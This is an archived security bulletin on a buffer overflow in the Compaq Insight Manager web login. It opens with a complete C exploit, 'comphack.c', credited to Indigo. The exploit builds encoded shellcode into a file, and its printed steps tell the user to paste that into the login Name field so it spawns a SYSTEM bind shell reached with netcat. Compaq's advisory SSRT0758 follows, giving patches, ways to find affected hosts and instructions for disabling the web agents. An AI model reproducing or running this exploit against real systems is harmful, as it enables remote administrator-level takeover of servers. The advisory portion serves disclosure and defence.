1st Oct 2001 [SBWID-4744]
COMMAND
Compaq Insight Manager
SYSTEMS AFFECTED
Compaq Insight Manager Web Interface
PROBLEM
Update
======
Indigo published an exploit for this : the bug is in the \"User Name\"
field of web login :
/* comphack.c - Compaq Insight Manager
overflow exploit by Indigo 2001
Usage: comphack
This code has been compiled and tested
on Linux and Win32
The shellcode spawns a SYSTEM shell on
the chosen port
Main shellcode adapted from code written
by izan@deepzone.org
Greets to:
Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/
/* #include uncomment if compiling on
Win32 */
#include
int main(int argc, char **argv)
{
unsigned char shellcode[] =
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61
\\x61\\x61\\x61\\x61\"
\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x2B\\x16\\xEA\\x77
\\xFF\\xE1\\x03\\x10\"
\"\\xEA\\x2F\\x05\\x10\\x90\\x90\\x90\\x90\\x31\\xFF\\x01\\xE7
\\x31\\xC9\\xB1\\x6F\"
\"\\x01\\xCF\\xB1\\x4C\\x01\\xCF\\x31\\xC0\\xB0\\x20\\x29\\x07
\\x31\\xDB\\xB3\\x18\"
\"\\x01\\xDF\\x29\\x07\\xB3\\x20\\x01\\xDF\\x29\\x07\\xB3
\\x1D\\x01\\xDF\\x29\\x07\"
\"\\xB3\\x19\\x01\\xDF\\x29\\x07\\xB3\\x55\\x01\\xDF\\x29\\x07
\\xB3\\x05\\x01\\xDF\"
\"\\xB3\\x05\\x01\\xDF\\x29\\x07\\xB3\\x4B\\x01\\xDF\\x29\\x07
\\xB3\\x12\\x01\\xDF\"
\"\\x29\\x07\\xB3\\x17\\x01\\xDF\\x29\\x07\\xB3\\x07\\x01
\\xDF\\x29\\x07\\xB3\\x14\"
\"\\x01\\xDF\\x29\\x07\\xB3\\x28\\x01\\xDF\\x29\\x07\\xB3
\\x3F\\x01\\xDF\\x29\\x07\"
\"\\xB3\\x7C\\x01\\xDF\\x29\\x07\\xB3\\xCE\\x01\\xDF\\x29\\x07
\\xB3\\x08\\x01\\xDF\"
\"\\x29\\x07\\xB3\\x3B\\x01\\xDF\\x29\\x07\\xB3\\x4B\\x01
\\xDF\\x29\\x07\\x66\\x81\"
\"\\xEF\\xA3\\x03\\x31\\xDB\\xB8\\x5F\\x5F\\x5F\\x5F\\x31\\x07
\\x47\\x47\\x47\\x47\"
\"\\x43\\x43\\x43\\x43\\x66\\x81\\xFB\\xFC\\x04\\x7E\\xEF\\xB7
\\x5F\\x5F\\x5F\\x5F\"
\"\\x02\\xDE\\xB2\\xA6\\x7E\\x1F\\x5F\\xD2
\\xEA\\xAD\\x7B\\x1F\\x5F\\xD2\\xE2\\xA5\"
\"\\x7B\\x1F\\x5F\\x35\\x58\\xCF\\xCF\\xCF\\xCF\\x06\\xB7
\\xAD\\x5D\\x5F\\x5F\\xD2\"
\"\\xEA\\x75\\x7A\\x1F\\x5F\\xD2\\xE2\\x6C\\x7A\\x1F\\x5F\\x35
\\x55\\xCF\\xCF\\xCF\"
\"\\xCF\\x06\\xB7\\xE5\\x5D\\x5F\\x5F\\x35\\x5F\\xD2\\xEA\\xA6
\\x7A\\x1F\\x5F\\x09\"
\"\\xD2\\xEA\\xBA\\x7A\\x1F\\x5F\\x09\\xD2\\xEA\\xB6
\\x7A\\x1F\\x5F\\x09\\xA0\\xCA\"
\"\\x6C\\x7A\\x1F\\x5F\\x35\\x5F\\xD2\\xEA\\xA6
\\x7A\\x1F\\x5F\\x09\\xD2\\xEA\\xB2\"
\"\\x7A\\x1F\\x5F\\x09\\xD2\\xEA\\xAE\\x7A\\x1F\\x5F\\x09\\xA0
\\xCA\\x6C\\x7A\\x1F\"
\"\\x5F\\xB8\\xDA\\xAA\\x7A\\x1F\\x5F\\x1B\\x5F\\x5F\\x5F\\xD2
\\xEA\\xAA\\x7A\\x1F\"
\"\\x5F\\x09\\xA0\\xCA\\x68\\x7A\\x1F\\x5F\\xD2\\xEA\\x72\\x79
\\x1F\\x5F\\xF2\\x0F\"
\"\\xA0\\xCA\\x0C\\x7A\\x1F\\x5F\\xD2\\xEA\\x6E\\x79
\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\"
\"\\x0C\\x7A\\x1F\\x5F\\xD2\\xEA\\xAE\\x7A\\x1F\\x5F\\xD2
\\xE2\\x72\\x79\\x1F\\x5F\"
\"\\xFA\\xD2\\xEA\\xBA\\x7A\\x1F\\x5F\\xF2\\xD2\\xE2
\\x6E\\x79\\x1F\\x5F\\xF4\\xD2\"
\"\\xE2\\x6A\\x79\\x1F\\x5F\\xF4\\xB8\\xDA\\x7A\\x79
\\x1F\\x5F\\x5F\\x5F\\x5F\\x5F\"
\"\\xB8\\xDA\\x7E\\x79\\x1F\\x5F\\x5E\\x5E\\x5F\\x5F\\xD2
\\xEA\\x66\\x79\\x1F\\x5F\"
\"\\x09\\xD2\\xEA\\xAA\\x7A\\x1F\\x5F\\x09\\x35\\x5F\\x35
\\x5F\\x35\\x4F\\x35\\x5E\"
\"\\x35\\x5F\\x35\\x5F\\xD2\\xEA\\x16\\x79\\x1F\\x5F\\x09\\x35
\\x5F\\xA0\\xCA\\x64\"
\"\\x7A\\x1F\\x5F\\x37\\x5F\\x7F\\x5F\\x5F\\xCF\\x37
\\x5F\\x5D\\x5F\\x5F\\xA0\\xCA\"
\"\\x1C\\x7A\\x1F\\x5F\\xD6\\xDA\\x0E\\x79
\\x1F\\x5F\\x6C\\xBF\\x0F\\x1F\\x0F\\x1F\"
\"\\x0F\\xA0\\xCA\\xA5\\x7B\\x1F\\x5F\\x0F\\x04\\x35\\x4F\\xD2
\\xEA\\xB6\\x7A\\x1F\"
\"\\x5F\\x09\\x0C\\xA0\\xCA\\xA1\\x7B\\x1F\\x5F\\x35
\\x5C\\x0C\\xA0\\xCA\\x5D\\x7A\"
\"\\x1F\\x5F\\xD2\\xEA\\x2A\\x79\\x1F\\x5F\\x09\\xD2\\xEA\\xB6
\\x7A\\x1F\\x5F\\x09\"
\"\\x0C\\xA0\\xCA\\x59\\x7A\\x1F\\x5F\\xD2\\xE2\\x06\\x79
\\x1F\\x5F\\xF4\\x6C\\xBF\"
\"\\x0F\\xD2\\xE2\\x3A\\x79\\x1F\\x5F\\x08\\x0F\\x0F\\x0F\\xD2
\\xEA\\xB6\\x7A\\x1F\"
\"\\x5F\\xF2\\x0F\\xA0\\xCA\\x60\\x7A\\x1F\\x5F\\x35\\x6F\\xA0
\\xCA\\x10\\x7A\\x1F\"
\"\\x5F\\xB4\\x12\\xCF\\xCF\\xCF\\x6C\\xBF\\x0F\\xD2\\xE2
\\x3A\\x79\\x1F\\x5F\\x08\"
\"\\x0F\\x0F\\x0F\\xD2\\xEA\\xB6\\x7A\\x1F\\x5F\\xF2\\x0F\\xA0
\\xCA\\x60\\x7A\\x1F\"
\"\\x5F\\x35\\x6F\\xA0\\xCA\\x10\\x7A\\x1F\\x5F\\xDC\\xE2
\\x3A\\x79\\x1F\\x5F\\x5D\"
\"\\x50\\xDD\\x48\\x5E\\x5F\\x5F\\xDE\\xE2\\x3A\\x79
\\x1F\\x5F\\x5E\\x7F\\x5F\\x5F\"
\"\\x2D\\x51\\xCF\\xCF\\xCF\\xCF\\xB8\\xDA\\x3A\\x79
\\x1F\\x5F\\x5F\\x7F\\x5F\\x5F\"
\"\\x35\\x5F\\xD4\\xDA\\x3A\\x79\\x1F\\x5F\\xD2\\xE2\\x3A\\x79
\\x1F\\x5F\\x08\\x0F\"
\"\\xD4\\xDA\\x0E\\x79\\x1F\\x5F\\x0F\\xD2\\xEA\\xB6
\\x7A\\x1F\\x5F\\xF2\\x0F\\xA0\"
\"\\xCA\\x18\\x7A\\x1F\\x5F\\x35\\x6F\\xA0\\xCA\\x10
\\x7A\\x1F\\x5F\\xD4\\xDA\\x3A\"
\"\\x79\\x1F\\x5F\\x35\\x5F\\x0F\\xD2\\xEA\\x0E\\x79
\\x1F\\x5F\\xF2\\x0F\\xD2\\xEA\"
\"\\x06\\x79\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\\x55
\\x7A\\x1F\\x5F\\x35\\x5F\\xD2\\xE2\"
\"\\x3A\\x79\\x1F\\x5F\\x08\\x35\\x5F\\x35\\x5F\\x35\\x5F\\xD2
\\xEA\\xB6\\x7A\\x1F\"
\"\\x5F\\xF2\\x0F\\xA0\\xCA\\x60\\x7A\\x1F\\x5F\\x35\\x6F\\xA0
\\xCA\\x10\\x7A\\x1F\"
\"\\x5F\\x6C\\xB6\\x66\\xD2\\x3A\\x79\\x1F\\x5F\\x50\\xD8\\x38
\\xA0\\xA0\\xA0\\x35\"
\"\\x5F\\x37\\x5F\\x7F\\x5F\\x5F\\xCF\\xD2\\xEA\\x0E\\x79
\\x1F\\x5F\\xF2\\x0F\\xD2\"
\"\\xEA\\x06\\x79\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\\x51
\\x7A\\x1F\\x5F\\xD6\\xDA\\x3E\"
\"\\x79\\x1F\\x5F\\x35\\x5F\\xD2\\xE2\\x3A\\x79\\x1F\\x5F\\x08
\\x0F\\xD2\\xEA\\x0E\"
\"\\x79\\x1F\\x5F\\xF2\\x0F\\xD2\\xEA\\xB2\\x7A\\x1F\\x5F\\xF2
\\x0F\\xA0\\xCA\\x14\"
\"\\x7A\\x1F\\x5F\\x35\\x6F\\xA0\\xCA\\x10\\x7A\\x1F\\x5F\\x35
\\x5F\\xD4\\xDA\\x3E\"
\"\\x79\\x1F\\x5F\\xD2\\xE2\\x3A\\x79\\x1F\\x5F\\x08\\x0F\\xD4
\\xDA\\x0E\\x79\\x1F\"
\"\\x5F\\x0F\\xD2\\xEA\\xB6\\x7A\\x1F\\x5F\\xF2\\x0F\\xA0
\\xCA\\x18\\x7A\\x1F\\x5F\"
\"\\x35\\x6F\\xA0\\xCA\\x10\\x7A\\x1F\\x5F\\xB6\\xE6\\xA1\\xA0
\\xA0\\xD2\\xEA\\x06\"
\"\\x79\\x1F\\x5F\\xF2\\x0F\\xA0\\xCA\\x4D\\x7A\\x1F\\x5F\\xD2
\\xEA\\x02\\x79\\x1F\"
\"\\x5F\\xF2\\x0F\\xA0\\xCA\\x4D\\x7A\\x1F\\x5F\\x35\\x5F\\xA0
\\xCA\\x08\\x7A\\x1F\"
\"\\x5F\\x0E\\x09\\x37\\x0F\\x6D\\x5A\\x4F\\xCF\\x05\\xA0
\\x4D\\x0F\\x04\\x06\\x08\"
\"\\x01\\x0E\\x09\\x0C\\x37\\x07\\x6D\\x5A\\x4F\\xCF\\x05\\xA0
\\x4D\\x0F\\xF3\\xDB\"
\"\\xBF\\x2A\\xA4\\x07\\xF4\\x06\\xBD\\xB6\\xBC\\x08\\x0C\\x10
\\x1C\\x14\\x6C\\x6D\"
\"\\x5F\\x2C\\x30\\x3C\\x34\\x3A\\x2B\\x5F\\x3D\\x36\\x31
\\x3B\\x5F\\x33\\x36\\x2C\"
\"\\x2B\\x3A\\x31
\\x5F\\x3E\\x3C\\x3C\\x3A\\x2F\\x2B\\x5F\\x2C\\x3A\\x31
\\x3B\\x5F\"
\"\\x2D\\x3A\\x3C\\x29\\x5F\\x3C\\x33\\x30\\x2C\\x3A\\x2C\\x30
\\x3C\\x34\\x3A\\x2B\"
\"\\x5F\\x14\\x1A\\x2D\\x11\\x1A\\x13
\\x6C\\x6D\\x5F\\x1C\\x2D\\x3A\\x3E\\x2B\\x3A\"
\"\\x0F\\x36\\x2F\\x3A\\x5F\\x18
\\x3A\\x2B\\x0C\\x2B\\x3E\\x2D\\x2B\\x2A\\x2F\\x16\"
\"\\x31\\x39\\x30
\\x1E\\x5F\\x1C\\x2D\\x3A\\x3E\\x2B\\x3A\\x0F\\x2D\\x30
\\x3C\\x3A\"
\"\\x2C\\x2C\\x1E\\x5F\\x0F\\x3A\\x3A\\x34\\x11\\x3E\\x32
\\x3A\\x3B\\x0F\\x36\\x2F\"
\"\\x3A\\x5F\\x18\\x33\\x30\\x3D\\x3E\\x33\\x1E\\x33\\x33\\x30
\\x3C\\x5F\\x2D\\x3A\"
\"\\x3E\\x3B\\x19\\x36\\x33\\x3A\\x5F\\x08\\x2D\\x36
\\x2B\\x3A\\x19\\x36\\x33\\x3A\"
\"\\x5F\\x0C\\x33\\x3A\\x3A\\x2F\\x5F\\x1C\\x33\\x30
\\x2C\\x3A\\x17\\x3E\\x31\\x3B\"
\"\\x33\\x3A\\x5F\\x1A\\x27\\x36\\x2B\\x0F\\x2D\\x30
\\x3C\\x3A\\x2C\\x2C\\x5F\\x1C\"
\"\\x30\\x3B\\x3A\\x3B\\x7F\\x3D\\x26\\x7F\\x23\\x05\\x3E\\x31
\\x7F\\x63\\x36\\x25\"
\"\\x3E\\x31\\x1F\\x3B\\x3A\\x3A\\x2F\\x25\\x30\\x31\\x3A\\x71
\\x30\\x2D\\x38\\x61\"
\"\\x5D\\x5F\\x40\\x17
\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\"
\"\\x53
\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5E\\x5F\\x5F\\x5F\\x5F\\x
5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x1C\\x12\\x1B\\x71\\x1A\\x07
\\x1A\\x5F\\x5F\\x5F\\x5F\\x5F\\x4F\\x5F\\x5F\\x5F\"
\"\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\x5F\\
x5F\\x5F\\x5F\\x5F\"
\"\\x56\\x56\\x56\\x56\\x56\\x00\";
FILE *fp;
unsigned short int a_port;
printf (\"\\nCompaq Insight Manager overflow
launcher\\nby Indigo 2001\\n\\n\");
printf (\"This program will generate a binary file called
exploit.bin\\n\");
printf (\"Connect to the victim using a web browser
http://victim:2301\\n\");
printf (\"Next to \\\'Login Account\\\', click on
\\\'anonymous\\\'\\n\");
printf (\"Enter some random characters into the
\\\'password\\\' field\\n\");
printf (\"Open exploit.bin in notepad, highlight it then
copy to the clipboard\\n\");
printf (\"Paste the exploit into the \\\'Name\\\' field and
click OK\\n\");
printf (\"\\nLaunch netcat: nc \\n\");
printf (\"\\nThe exploit spawns a SYSTEM shell on the
chosen port\\n\\n\");
if (argc != 2)
{
printf (\"Usage: %s \\n\", argv[0]);
exit (0);
}
a_port = htons(atoi(argv[1]));
a_port^= 0x5f5f;
shellcode[1650]= (a_port) & 0xff;
shellcode[1651]= (a_port >> 8) & 0xff;
fp = fopen (\"./exploit.bin\",\"wb\");
fputs (shellcode,fp);
fclose (fp);
return 0;
}
Compaq Management Software Security Advisory #SSRT0758 :
(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.
Compaq Management Software Security Vulnerability (SSRT0758)
SOURCE: Software Security Response Team U.S.
Compaq Computer Corporation
*Reference SSRT0758*
PATCHES SUPERSEDED BY THIS ADVISORY:
The software upgrades and patches also fix all previous Compaq
Management Software security vulnerabilities reported in the following
Compaq Security Advisories:
* Compaq Management Software Security Vulnerability - SSRT0715
(March, 2001)
* Compaq Web-enabled Management Software Security Vulnerability
- SSRT0705 (January 2001)
SUMMARY
Compaq Management Software products undergo rigorous quality assurance
processes to ensure that they meet the highest possible standards for
security, reliability and usability. In line with this commitment,
Compaq recently uncovered a potential buffer overflow security
vulnerability in its Web-enabled Management Software. This
vulnerability has the potential to enable unauthorized users to execute
code at an administrator level through the exploitation of a buffer
overflow. Compaq has addressed this issue with version 5.2 of the
Compaq Management Agents and developed a patch that may be downloaded
from the Compaq website (see details below) to fix existing Agents
installations.
Compaq strongly recommends that customers upgrade to version 5.2 of the
Compaq Management Agents or apply the appropriate patch.
Compaq strongly recommends that web-enabled agents and utilities be
deployed only on private networks and are not used on the open Internet
or on systems outside the bounds of the firewall. The implementation of
sound security practices, which includes disabling external access to
Compaq management ports should help to protect customers from external
malicious attacks. Compaq also recommends that strong password
standards are used and that passwords are changed regularly.
NOTE: The complete online document is available from
http://www.compaq.com/manage/security and should be
checked frequently for new patch release information.
If a TBD is entered for a product, please contact your
normal Compaq support channel to inquire about a
specific product solution status.
SCOPE OF THE PROBLEM
The web component of Compaq web-enabled management software provides
HTTP services to allow management information to be accessible through
a web browser. Web-enabled management software is provided for the
majority of the operating systems that Compaq supports on its
Intel-based and Alpha-based server and client systems. These operating
systems include Microsoft Windows 9x, Windows NT and Windows 2000,
Novell NetWare, SCO UnixWare 7, Red Hat Linux 6.2 and 7.0, SuSE Linux
7.0 & 7.1, Tru64 Unix and Open VMS. Web-enabled management software
is also supported for Compaq storage products.
This Security Advisory applies to all Compaq Web-enabled Management
Software. A list of affected software versions is available at
http://www.compaq.com/products/servers/management/mgtsw-advisory2.html
(note the url above may wrap unintentionally)
UNAFFECTED SOFTWARE VERSIONS
The web-enabled component of the Compaq Remote Insight Lights-Out
Edition board is NOT affected. Also unaffected are the downloadable
integration modules that Compaq provides to enhance the management of
Compaq platforms from within enterprise management consoles such as CA
Unicenter TNG, Tivoli Enterprise, Tivoli NetView, and HP OpenView.
WHAT COMPAQ IS DOING
Compaq is currently completing the testing and release of fixes for the
affected software. Compaq Management CD Version 5.2 includes an update
that fixes the buffer overflow security vulnerability issue in some
Compaq Web-enabled Management Software. In addition to releasing new
versions of the software, Compaq will also release software patches to
update existing versions of the web-enabled management software.
Three patches are now available for download from:
ftp://ftp.compaq.com/pub/softpaq/sp17501-18000/
SoftPaq SP 17926 fixes the problem for affected versions of Compaq
Foundation Agents for Windows Servers, Compaq Survey for Windows,
Compaq Power Manager, Compaq Intelligent Cluster Administrator,
and Compaq Availability Agents. This patch also fixes the problem
for the SNMP and DMI agents installed with Compaq Insight Manager
XE Version 2.0 and 2.1. Compaq recommends applying the patch if
any of the Compaq Management Software mentioned above is
installed.
SoftPaq SP 17927 fixes the problem for affected versions of the
Compaq Foundation Agents for Novell NetWare servers.
SoftPaq SP 17928 fixes the problem for affected versions of the
Compaq Foundation Agents for Linux servers
Compaq Security Advisory SSRT0758 will be updated as needed to
communicate availability and plans for new versions of all the affected
software.
WHAT CUSTOMERS SHOULD DO
Determine which systems are running Compaq web-enabled agents or
utilities. There are three methods suggested.
Method 1
Point a web browser to the system by keying in http://[IP_ADDRESS]:
2301 or http://[machine_name]:2301.
This will bring up the device home page for any servers running
web-enabled management software, and display a list of the components.
NOTE: The lists generated by Methods 2 and 3, while helpful, may not be
exhaustive lists of the systems with web-enabled agents and utilities.
The lists will include only those systems that are being managed either
explicitly or because they have been discovered.
Method 2
Systems running Compaq Insight Manager XE, can get a list of systems
running the web-enabled agents by defining a Query to return a list of
systems with web agents.
Login to your Compaq Insight Manager XE system and create a new
Query. Select the \"Devices with Web Agent\" criteria. - - - - Select
all of the available products on the Criteria Configuration screen. - -
- - Save the Query and execute it. The list of devices will be all
those with web agents.
Method 3
Systems running Compaq Insight Manager Windows 32 console, can get a
list of systems running the web agents by starting Compaq Insight
Manager and selecting the \"Web Device List\" button on the toolbar.
This will display a list of systems being managed by Compaq Insight
Manager and additionally will have underlined as hyperlinks the systems
on which the web agents are present and enabled. To print out a list of
only the web devices, select the \"Web Devices\" hyperlink in the left
column and only web devices will be shown. Print this page from your
browser.
If for any reason the software cannot be updated or the patch applied,
Compaq recommends that the web-enabled components of Compaq Management
Software be temporarily disabled; by following the procedures outlined
at the end of this advisory.
Compaq has always advised that web-enabled agents and utilities be
deployed only in private networks and not used on the Internet or on
systems outside the bounds of a firewall. Verify that you have
disallowed access to non-essential IP ports on your firewall or proxy
protecting the corporate network from the Internet. The disabling of
such ports, which include port 2301 (Device Management Port) and port
280 (Compaq Insight Manager XE port), is part of a sound security
policy for your network.
SOLUTION
Updated software will be made available on the web through the system
software download site
(http://www.compaq.com/support/files/server/us/index.html) and will
also be proactively delivered directly to customers who have installed
Compaq ActiveUpdate. ). Compaq recommends registering for the
ActiveUpdate service, which is available at the following URL:
http://www.compaq.com/activeupdate.
OBTAINING SUPPORT ON THIS ISSUE
The normal process for obtaining support on Compaq products is pursued
in the country of residence. . If you do not have an established
support process, you may find information about support by visiting the
Compaq web site for your country. You can find that web site by picking
your country from the list at http://www.compaq.com/worldwide/. You may
also find a support number for your locale from the table at
http://www.compaq.com/corporate/overview/world_offices.html
Support can help you to: 1. Identify if you have an affected version.
2. Obtain the appropriate SoftPaq when it is available. 3. Apply and
run the SoftPaq. Compaq support personnel are aware of the issues and
the fixes and are well versed in Compaq systems management products.
DISABLING THE WEB-ENABLED AGENTS
If you are unable to wait for the fix to become available, you can use
the following procedures to disable the web component of the agents.
For those cases where it is not possible to disable only the web
component, instructions are provided below for disabling the entire
agent or utility.
Microsoft Windows Servers Web-based management is enabled, by default,
when you install the Compaq Server Management Agents for Windows NT.
Perform the following steps to disable web-based management:
1.From the START menu, select SETTINGS, then CONTROL PANEL. 2. From the
CONTROL PANEL, select and run the SERVICES applet. 3. Select INSIGHT
WEB AGENT from the list of services. 4. If it is running, click the
button marked STOP. 5. To prevent it from automatically starting again,
click STARTUP and then select DISABLED. 6. Click OK. 7. Click CLOSE.
This will stop the web agents and prevent them from starting
automatically. SNMP management is still enabled.
For Windows 2000 - Right click My Computer on the desktop; select
Manage. This will display a window titled \"Computer Management\",
Click the \"Services\" item under the \"Services and Applications\"
node. The right side of the window will show the services installed on
the system. Perform steps 3 through 7 from above.
NetWare Server Agents If you enabled web-based management when you
installed the Compaq Management Agents for NetWare, and later would
like to disable it, perform the following steps from the NetWare server
console:
1. LOAD CPQAGIN. 2. Select the option \"Configure Existing NetWare
Agents\". 3. Select the line that mentions the loading of CPQWEBAG and
select NO. 4. Save changes and exit CPQAGIN. This prevents the
web-enabled agents from loading. SNMP management is still enabled.
Linux Server Agents To stop running web agent:
1. Log in as \"root\".
2. Run \"/etc/rc.d/init.d/cmafdtn stop cmawebd\" command.
To disable web agent so it will not start during reboot or run level
changes:
1. Log in as \"root\".
2. Edit \"/etc/rc.d/init.d/cmafdtn\" file (using vi or other
editors) and remove \"cmawebd\" from following line:
PNAMES=\"cmafdtnpeerd cmahostd cmathreshd cmawebd\"
SCO UnixWare 7 Agents (UnixWare 2 agents are NOT Web-Enabled) To stop
running web agent:
1. Log in as \"root\":
2. Run \"sh /etc/init.d/cmaweb stop\" command.
To disable web agent so it will not be started during reboot or when
entering multi-user mode:
1. Log in as \"root\".
2. Run \"rm /etc/rc2.d/[SK]*cmaweb\" command.
SCO OpenServer Agents To stop running web agent:
1. Log in as \"root\".
- - - - 2. Run \"sh /etc/cmaweb stop\" command. To disable Web Agent so
it will not be started during reboot or entering multi-user mode:
1. Log in as \"root\".
2. Run \"rm /etc/rc2.d/[SK]*cmaweb\" command.
Survey for Windows, Survey for NetWare, and Survey for Linux It is not
possible to disable only the web-component of Survey Utility. Follow
the instructions below to disable the full service: Survey for Windows
- - - From the command prompt, type the following command:
%SystemDrive%\\COMPAQ\\SURVEY\\SURVEY-U. . This will unload the Survey
service and prevent it from starting up on the next reboot.
Survey for NetWare To unload Survey for NetWare from the console
screen, type the following command: UNLOAD SURVEY
During the default Survey install, Survey is automatically started by
adding the line \"load SURVEY -w10 -cWed.12,7 \" to the AUTOEXEC.NCF.
To prevent Survey from automatically starting next time the server is
restarted, remove that line.
Survey for Linux To stop the Survey for Linux web daemon, type the
following command:
kill `ps -e | grep surveywebd | awk \'{print $1}\'`
System Healthcheck 1. Change to the SHC bin directory ( e.g. cd
%systemdrive%\\compaq\\shc\\bin). 2. Stop the service by typing \"net
stop cpqshc\". 3. Remove the service by typing \"shcsvc -remove\". Note
that the command line interface to SHC will continue to work.
Compaq Power Management Agents To stop running web agent:
1. From the Windows Control Panel, double-click \"Services\".
2. In the Services dialog list box, click on \"Compaq
Power Management Web Agent\".
3. Click the \"Stop\" button to stop the Agent.
To prevent the service from being restarted, click on the
\"Startup...\" button and choose \"Disabled\", and then click \"OK\"..
OpenVMS Management Agents
To stop running web agent:
1. Log into the system account.
2. For V1.0 and V2.0
$@sys$specific:[wbem]stop_webagents
<mailto:$@sys$specific:[wbem]stop_webagents>
3. For V2.1 $@sys$specific:[wbem]wbem$shutdown
<mailto:$@sys$specific:[wbem]wbem$shutdown>
Compaq Management Agents and Tools for Servers for SCO UnixWare 7
NonStop Clusters
To stop running web agent:
1. Login as \"root\".
2. Exexcute the following two command lines:
execute `onall /etc/init.d/cmaweb stop`
`chmod 777 /etc/init.d/cmaweb 000
Tru64 UNIX Management Agents
To stop running Web Agent:
1. Log in as \"root\".
2. Execute \"/sbin/init.d/insightd stop\" command.
To disable the Web Agents so they will not be started during
reboot or when entering multi-user mode:
1. Log in as \"root\".
2. On Tru64 UNIX V4.0f and V4.0g, execute \"rm
/sbin/rc2.d/*insightd\".
3. On Tru64 UNIX V5.0 and later, execute the
command: \"/usr/sbin/rcmgr set INSIGHTD_CONF -1
To enable the Web Agents again once the Patch Kit has been
installed:
1. Log in as \"root\".
